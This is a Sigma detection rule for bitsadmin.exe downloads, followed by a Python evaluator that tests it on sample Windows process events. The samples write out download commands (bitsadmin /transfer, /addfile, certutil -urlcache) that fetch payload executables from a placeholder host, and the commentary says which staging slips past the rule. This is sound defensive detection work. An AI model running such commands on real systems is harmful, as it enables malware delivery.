BITSAdmin Downloading Malicious Binaries (RedCanary Threat Detection Report)

Detects attempts to bypass security controls using bitsadmin.exe to download malicious code. Part of the RedCanary 2023 Threat Detection Report.

Sigma rule (View on GitHub)

```yaml
title: BITSAdmin Downloading Malicious Binaries (RedCanary Threat Detection Report)
id: 0a6b7cc5-f28e-4795-94bf-48112d89664b
status: experimental
description: |
    Detects attempts to bypass security controls using bitsadmin.exe to download malicious code.
    Part of the RedCanary 2023 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2023/05/10
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\bitsadmin.exe'
        CommandLine|contains:
            - 'download'
            - 'transfer'
    condition: selection
falsepositives:
    - Unknown
level: low
```
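To show concretely what the `selection` block matches, here is an added example that is not part of the Sigma rule or the Red Canary report: a small Python evaluator for the rule's two conditions, run over constructed process-creation records in the shape of Sysmon Event ID 1 (`Image`, `CommandLine`). The host paths, job names and URLs are made up for the example.

```python
"""Evaluate the bitsadmin Sigma selection over sample process-creation events.

Added example, not the rule's or the report's own code. Implements only the
two modifiers the rule uses: Image|endswith and CommandLine|contains.
"""
from dataclasses import dataclass
from typing import Iterable

# Sigma string matching is case-insensitive by default, so both sides are
# lowercased before comparison (an all-caps BITSADMIN.EXE still matches).
RULE_IMAGE_SUFFIX = "\\bitsadmin.exe"
RULE_CMDLINE_TERMS = ("download", "transfer")


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # command line as logged


def matches_selection(ev: ProcessEvent) -> bool:
    """Image|endswith '\\bitsadmin.exe' AND CommandLine|contains any listed term."""
    image_ok = ev.image.lower().endswith(RULE_IMAGE_SUFFIX)
    cmd = ev.command_line.lower()
    cmdline_ok = any(term in cmd for term in RULE_CMDLINE_TERMS)
    return image_ok and cmdline_ok


def find_hits(events: Iterable[ProcessEvent]) -> list[ProcessEvent]:
    """Return every event for which the rule's condition (selection) is true."""
    return [ev for ev in events if matches_selection(ev)]


# Constructed sample events (hypothetical paths, job names and URLs).
SAMPLE_EVENTS = [
    # Classic one-liner: /transfer with the /download transfer type -> hit
    ProcessEvent(
        r"C:\Windows\System32\bitsadmin.exe",
        r"bitsadmin.exe /transfer job1 /download /priority foreground "
        r"http://files.example.invalid/payload.exe C:\Users\Public\payload.exe",
    ),
    # Mixed case from the SysWOW64 copy -> still a hit (case-insensitive matching)
    ProcessEvent(
        r"C:\Windows\SysWOW64\BITSADMIN.EXE",
        r"BITSADMIN.EXE /Transfer upd http://files.example.invalid/a.dll C:\ProgramData\a.dll",
    ),
    # Staged job built with /create, /addfile and /resume: neither keyword appears -> miss
    ProcessEvent(
        r"C:\Windows\System32\bitsadmin.exe",
        r"bitsadmin.exe /addfile job2 http://files.example.invalid/b.exe C:\Users\Public\b.exe",
    ),
    # Benign administrative use -> no hit
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe /list /allusers"),
    # Different binary: the Image check fails even though the tool downloads -> no hit
    ProcessEvent(
        r"C:\Windows\System32\certutil.exe",
        "certutil.exe -urlcache -split -f http://files.example.invalid/c.exe c.exe",
    ),
]


def hit_command_lines(events: Iterable[ProcessEvent] = SAMPLE_EVENTS) -> list[str]:
    """Command lines of the sample events that trigger the rule."""
    return [ev.command_line for ev in find_hits(events)]


if __name__ == "__main__":
    for line in hit_command_lines():
        print("HIT:", line)
```

Two things the run makes visible. First, Sigma's default string matching is case-insensitive, so a backend that compiles `contains` to a case-sensitive search would silently lose the second event; check the generated query, not just the YAML. Second, the rule keys on the words `download` and `transfer`, so a job assembled with `bitsadmin /create`, `/addfile` and `/resume` (the third event) is not covered; if that matters in your environment, extend the `CommandLine|contains` list rather than relying on this rule alone, and expect to add `falsepositives` entries for legitimate administrative use before raising the level above `low`.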
